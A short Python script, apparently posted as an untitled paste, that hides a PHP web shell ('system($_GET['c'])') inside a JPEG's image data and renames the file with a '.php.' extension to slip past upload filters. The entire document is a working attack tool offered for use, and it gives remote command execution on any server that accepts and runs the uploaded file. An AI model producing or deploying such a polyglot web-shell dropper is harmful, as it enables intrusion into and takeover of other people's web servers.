Untitled

#!/usr/bin/env python

# a simple script to inject PHP code into JPG file
# thanks to Damien Cauquil for insetPayload()
# ref: https://virtualabs.fr/Nasty-bulletproof-Jpegs-l.html

from sys import argv
import struct


def insertPayload(_in, _out, payload,off):
    img = _in
    # look for 'FF DA' (SOS)
    sos = img.index("\xFF\xDA")
    sos_size = struct.unpack('>H',img[sos+2:sos+4])[0]
    sod = sos_size+2
    # look for 'FF D9' (EOI)
    eoi = img[sod:].index("\xFF\xD9")
    # enough size ?
    if (eoi - sod - off)>=len(payload):
            _out.write(img[:sod+sos+off]+payload+img[sod+sos+len(payload)+off:])
            return True
    else:
            return False


filein = argv[1]
fileout = argv[1].replace(".",".php.")

payload = '<?=system($_GET[\'c\']);?>'

with open(filein, "rb") as rd:
    data = rd.read()

with open(fileout, "wb") as wr:
    insertPayload(data,wr,payload,4)